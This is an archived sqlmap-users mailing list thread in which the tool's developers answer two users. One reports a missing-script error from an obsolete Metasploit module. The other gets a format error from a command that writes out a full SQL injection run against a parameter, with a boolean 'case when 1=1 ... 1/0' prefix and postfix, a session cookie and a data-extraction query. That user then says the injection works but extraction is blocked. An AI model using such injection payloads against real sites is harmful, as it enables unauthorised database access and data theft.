Hi. Metasploit's module sqlmap(.rb) is obsolete. Kind regards, Miroslav Stampar On Fri, Aug 3, 2012 at 6:37 PM, D Atkin <je...@ho...> wrote: > hi > > im try to run sqlmap from msf but i keep getting this error > > the sqlmap script could not be found: > > iv already had sqlmap path to system Path envirounment put im still > getting this error. > > can u tell me what i can do from here. > > Thank you! > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sqlma...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Bernardo Damele A. G. <berna…@gm…> — 2009-06-24 14:12:46 |
Hi, On Mon, Jun 22, 2009 at 14:03, sql pirate<sqlpi...@go...> wrote: > ... > ./sqlmap.py -u > "http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1" > -p FLD_listInstancesOrderBy --string=rowHighSmall > --proxy=http://127.0.0.1:8080/ > --cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg" > --delay=1 --prefix="%2b(select%20case%20when%201=1" > --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select > 'bla' from dual" > ... > forgedPayload = payload % (expressionUnescaped, idx, limit) > ValueError: unsupported format character 'b' (0x62) at index 104 > ... Use latest sqlmap from subversion repository. Avoid uri encoding in --prefix and --postfix options' value. sqlmap uri encode the HTTP request parameters properly automatically. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +447788962949 (UK), +393493821385 (IT) PGP Key ID: 0x05F5A30F |
From: Bernardo Damele A. G. <berna…@gm…> — 2009-06-24 21:58:17 |
---------- Forwarded message ---------- From: sql pirate <sqlpi...@go...> Date: Wed, Jun 24, 2009 at 21:59 Subject: Re: [sqlmap-users] sqlmap error To: "Bernardo Damele A. G." <berna...@gm...> Hi Bernando, thanks for your help. Your tool works now for this vulnerability! Though I have some other restrictions from the application now which prevents me from extracting data :-( Cheers, Jan 2009/6/24 Bernardo Damele A. G. <berna...@gm...> > > Hi, > > On Mon, Jun 22, 2009 at 14:03, sql pirate<sqlpi...@go...> wrote: > > ... > > ./sqlmap.py -u > > "http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1" > > -p FLD_listInstancesOrderBy --string=rowHighSmall > > --proxy=http://127.0.0.1:8080/ > > --cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg" > > --delay=1 --prefix="%2b(select%20case%20when%201=1" > > --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select > > 'bla' from dual" > > ... > > forgedPayload = payload % (expressionUnescaped, idx, limit) > > ValueError: unsupported format character 'b' (0x62) at index 104 > > ... > > Use latest sqlmap from subversion repository. > Avoid uri encoding in --prefix and --postfix options' value. sqlmap > uri encode the HTTP request parameters properly automatically. > > Cheers, > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobiles: +447788962949 (UK), +393493821385 (IT) > PGP Key ID: 0x05F5A30F -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobiles: +447788962949 (UK), +393493821385 (IT) PGP Key ID: 0x05F5A30F |